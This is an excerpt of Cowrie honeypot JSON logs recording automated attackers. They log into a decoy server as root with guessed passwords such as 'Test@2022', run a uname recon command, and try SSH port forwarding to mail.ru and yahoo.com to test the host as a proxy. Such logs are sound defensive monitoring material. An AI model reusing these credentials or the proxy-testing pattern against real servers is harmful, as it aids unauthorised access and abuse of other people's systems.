{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":20601,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:20601","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.428298Z","session":"09b1a15e988b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.478330Z","src_ip":"77.83.207.83","session":"09b1a15e988b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":9999,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:9999","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.620259Z","session":"09b1a15e988b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.670364Z","src_ip":"77.83.207.83","session":"09b1a15e988b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.722188Z","src_ip":"77.83.207.83","session":"09b1a15e988b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23411,"dst_ip":"1.2.3.4","dst_port":22,"session":"3faeceae710d","protocol":"ssh","message":"New connection: 77.83.207.83:23411 (1.2.3.4:22) [session: 3faeceae710d]","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.773047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.773907Z","src_ip":"77.83.207.83","session":"3faeceae710d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:23.825735Z","src_ip":"77.83.207.83","session":"3faeceae710d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.084642Z","src_ip":"77.83.207.83","session":"3faeceae710d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16279,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16279","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.137506Z","session":"3faeceae710d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.189553Z","src_ip":"77.83.207.83","session":"3faeceae710d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":6239,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:6239","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.334317Z","session":"3faeceae710d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.386452Z","src_ip":"77.83.207.83","session":"3faeceae710d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":15314,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15314","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.530340Z","session":"3faeceae710d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.582775Z","src_ip":"77.83.207.83","session":"3faeceae710d"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.635600Z","src_ip":"77.83.207.83","session":"3faeceae710d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23539,"dst_ip":"1.2.3.4","dst_port":22,"session":"8393e3a936cf","protocol":"ssh","message":"New connection: 77.83.207.83:23539 (1.2.3.4:22) [session: 8393e3a936cf]","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.684271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.684921Z","src_ip":"77.83.207.83","session":"8393e3a936cf"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.734955Z","src_ip":"77.83.207.83","session":"8393e3a936cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:51:24.765612Z","src_ip":"212.227.125.160","session":"8ec147866074"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.766429Z","src_ip":"212.227.125.160","session":"8ec147866074"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:24.983135Z","src_ip":"77.83.207.83","session":"8393e3a936cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3845,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:3845","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.033728Z","session":"8393e3a936cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.083599Z","src_ip":"77.83.207.83","session":"8393e3a936cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":417,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:417","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.224227Z","session":"8393e3a936cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.274267Z","src_ip":"77.83.207.83","session":"8393e3a936cf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":4671,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:4671","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.416270Z","session":"8393e3a936cf"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.466354Z","src_ip":"77.83.207.83","session":"8393e3a936cf"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.517031Z","src_ip":"77.83.207.83","session":"8393e3a936cf"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23643,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0bb4e606aef","protocol":"ssh","message":"New connection: 77.83.207.83:23643 (1.2.3.4:22) [session: e0bb4e606aef]","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.565726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.567169Z","src_ip":"77.83.207.83","session":"e0bb4e606aef"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.617069Z","src_ip":"77.83.207.83","session":"e0bb4e606aef"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.865793Z","src_ip":"77.83.207.83","session":"e0bb4e606aef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29292,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:29292","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.916697Z","session":"e0bb4e606aef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:25.966610Z","src_ip":"77.83.207.83","session":"e0bb4e606aef"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":12263,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:12263","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.108295Z","session":"e0bb4e606aef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.158229Z","src_ip":"77.83.207.83","session":"e0bb4e606aef"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.229052Z","src_ip":"212.227.235.229","session":"9cb77ceeb8d3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":13542,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:13542","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.300145Z","session":"e0bb4e606aef"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.349948Z","src_ip":"77.83.207.83","session":"e0bb4e606aef"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.400434Z","src_ip":"77.83.207.83","session":"e0bb4e606aef"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23764,"dst_ip":"1.2.3.4","dst_port":22,"session":"2dfa48b43cb2","protocol":"ssh","message":"New connection: 77.83.207.83:23764 (1.2.3.4:22) [session: 2dfa48b43cb2]","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.450169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.460224Z","src_ip":"77.83.207.83","session":"2dfa48b43cb2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.500545Z","src_ip":"77.83.207.83","session":"2dfa48b43cb2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.751221Z","src_ip":"77.83.207.83","session":"2dfa48b43cb2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16222,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16222","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.802273Z","session":"2dfa48b43cb2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.852641Z","src_ip":"77.83.207.83","session":"2dfa48b43cb2"}
{"eventid":"cowrie.session.closed","duration":12.76330018043518,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.894199Z","src_ip":"212.227.235.229","session":"c2e379afb6de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":12189,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:12189","sensor":"my-vps","timestamp":"2025-08-31T03:51:26.996682Z","session":"2dfa48b43cb2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.047053Z","src_ip":"77.83.207.83","session":"2dfa48b43cb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56845,"dst_ip":"1.2.3.4","dst_port":23,"session":"6aeee8366c08","protocol":"telnet","message":"New connection: 212.227.235.229:56845 (1.2.3.4:23) [session: 6aeee8366c08]","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.097454Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":20675,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20675","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.188694Z","session":"2dfa48b43cb2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.239171Z","src_ip":"77.83.207.83","session":"2dfa48b43cb2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.290773Z","src_ip":"77.83.207.83","session":"2dfa48b43cb2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":23880,"dst_ip":"1.2.3.4","dst_port":22,"session":"59e21c17d010","protocol":"ssh","message":"New connection: 77.83.207.83:23880 (1.2.3.4:22) [session: 59e21c17d010]","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.340605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:51:27.341470Z","src_ip":"77.83.207.83","session":"59e21c17d010"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp25